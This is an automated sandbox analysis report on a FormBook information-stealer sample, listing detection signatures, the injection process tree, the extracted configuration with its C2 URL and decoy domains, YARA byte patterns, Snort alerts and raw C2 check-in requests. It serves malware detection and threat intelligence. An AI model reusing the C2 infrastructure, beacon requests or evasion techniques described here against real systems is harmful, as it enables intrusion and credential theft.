Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Y4U48592345670954.exe

Overview

General Information

Sample Name:Y4U48592345670954.exe
Analysis ID:383918
MD5:e8e69391d3a931e6638adaebf6a339f6
SHA1:29c02e786c6f8b343bc0f05a1195ff5215d21e63
SHA256:20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Y4U48592345670954.exe (PID: 7016 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
    • Y4U48592345670954.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 2628 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5052 cmdline: /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.Y4U48592345670954.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.Y4U48592345670954.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.Y4U48592345670954.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        2.2.Y4U48592345670954.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.Y4U48592345670954.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2wAvira URL Cloud: Label: malware
          Source: http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85DAvira URL Cloud: Label: malware
          Source: http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0UpAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Y4U48592345670954.exeVirustotal: Detection: 17%Perma Link
          Source: Y4U48592345670954.exeReversingLabs: Detection: 16%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.NETSTAT.EXE.32fe660.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.NETSTAT.EXE.3d6f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Y4U48592345670954.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: netstat.pdbGCTL source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y4U48592345670954.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 4x nop then pop ebx2_2_00407B02
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 4x nop then pop ebx2_1_00407B02
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx4_2_00D57B02

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.middlehambooks.com/klf/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1Host: www.contecoliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.identityofplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1Host: www.constipationhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.tententacleshydro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1Host: www.contecoliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.identityofplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1Host: www.constipationhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.tententacleshydro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.contecoliving.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000002.915663862.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmpString found in binary or memory: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
